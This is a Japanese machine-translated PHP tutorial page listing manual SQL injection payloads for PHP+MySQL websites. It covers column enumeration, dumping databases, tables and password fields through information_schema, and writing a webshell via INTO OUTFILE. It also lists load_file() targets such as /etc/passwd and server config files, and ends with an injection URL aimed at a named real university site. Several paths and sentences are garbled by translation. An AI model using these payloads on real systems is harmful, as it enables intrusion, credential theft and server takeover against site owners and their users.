ホームページ >バックエンド開発 >PHPチュートリアル >PHP+MySQL 手動インジェクション ステートメントの推奨事項_PHP チュートリアル

PHP+MySQL 手動インジェクション ステートメントの推奨事項_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 15:43:44918ブラウズ

暴字段长度

Order by num/*


匹配字段

and 1=1 union select 1,2,3,4,5…….n/*


暴字段位置

and 1=2 union select 1,2,3,4,5…..n/*


利用内置函数暴数据库信息

version() database() user()  

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限:

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—


猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1


暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法(一个可用字段显示两个数据内容)

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件:1、知道站点物理路径

       2、有足够大的权限(可以用select …. from mysql.user测试)

       3、magic_quotes_gpc()=OFF

select   ‘'   into outfile ‘物理路径'

and 1=2 union all select 一句话HEX值 into outfile '路径'


load_file() 常用路径:


1.交換(Load_File(0×2F6574632F70617373737764)、0×3c、0×20)
2。Load_file(char(47,101,116,99,47,112,97,115,115,119,100)、char(60)、char(3) )
上記の2つは、PHPファイル内の完全な表示コードを表示するためのもので、「<」などの一部の文字が置換されず、Webページが表示されないことがあります。
3.load_file(char(47 )) FreeBSD と Sunos システムのルートディレクトリを一覧表示できます
4./etc tpd/conf tpd.conf または /usr/local/apche/conf tpd.conf linux APACHE 仮想ホストの表示設定ファイル
5. c:Program FilesApache GroupApacheconf httpd .conf または C:apacheconf httpd.conf WINDOWS システムの Apache ファイルを表示します
6. c:/Resin-3.0.14/conf/resin.conf のレジンファイルの設定情報を表示しますjsp によって開発された Web サイト
7. c:/Resin/conf /resin.conf /usr/local/resin/conf/resin.conf Linux システムに設定された JSP 仮想ホストを表示します
8. d:APACHEApache2confhttpd.conf
9. C:Program Filesmysqlmy.ini
10.../主題/darkblue_orange /layout.inc.php phpmyadmin展開パス
11. c:windowssystem32inetsrvMetaBase.xml IISの仮想ホスト設定ファイルを表示
12. /usr/local/ resin-3.0.22/conf/resin.conf 3.0.22のRESIN設定 ファイルビュー
13. /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14. /usr/local /app/apache2/conf/extra tpd-vhosts.conf APASHE仮想ホストビュー
15 , /etc/sysconfig/iptables ファイアウォールポリシーを参照してください
16. usr/local/app/php5 b/php.ini PHP相当の設定
17. /etc/my.cnf MYSQL設定ファイル
18. /etc/redhat -release Red Hatのシステムバージョン
19. C:mysqldatamysqluser.MYD ユーザーパスワードはMYSQLシステムに存在します
20. /etc/sysconfig /network-scripts/ifcfg-eth0 IPを確認します
21. /usr/local/app/php5 b/php.ini //PHP関連の設定
22./usr/local/app/apache2/conf/extra tpd- vhosts.conf //仮想Webサイトの設定
23. C:Program FilesRhinoSoft.comServ-USvUDaemon.ini
24. c:windowsmy.ini
25. c:boot.ini

一般的に使用される Web サイト設定ファイル config.inc.php、config.php。 load_file() を実行するときは、replace(load_file(HEX), char(60), char(32)) を使用します

注:

Char(60)

を意味します

Char(32)スペース

を意味します

手動注射中に発生する問題:

注入後、ページに次が表示されます:

操作 'UNION' の照合順序 (latin1_swedish_ci,IMPLICIT) と (utf8_general_ci,IMPLICIT) の不正な組み合わせです

例: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3 、4,user()%20

これは、フロントエンコーディングとバックエンコーディングの間の不一致が原因で発生します。

解決策: パラメーターの前に unhex(hex(parameter)) を追加するだけです。上記の URL は次のように変更できます:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69)) ),3,4,unhex(hex(user()))%20

注射を続けることができます。 。 。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/320712.html技術記事爆発物フィールドの長さ num/* 一致フィールドと 1=1 共用体を選択 1,2,3,4,5…….n/* 爆発物フィールドの位置と 1=2 共用体を選択 1,2,3,4,5... ..n/* 組み込み関数を使用してデータベース情報バージョンを公開します...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。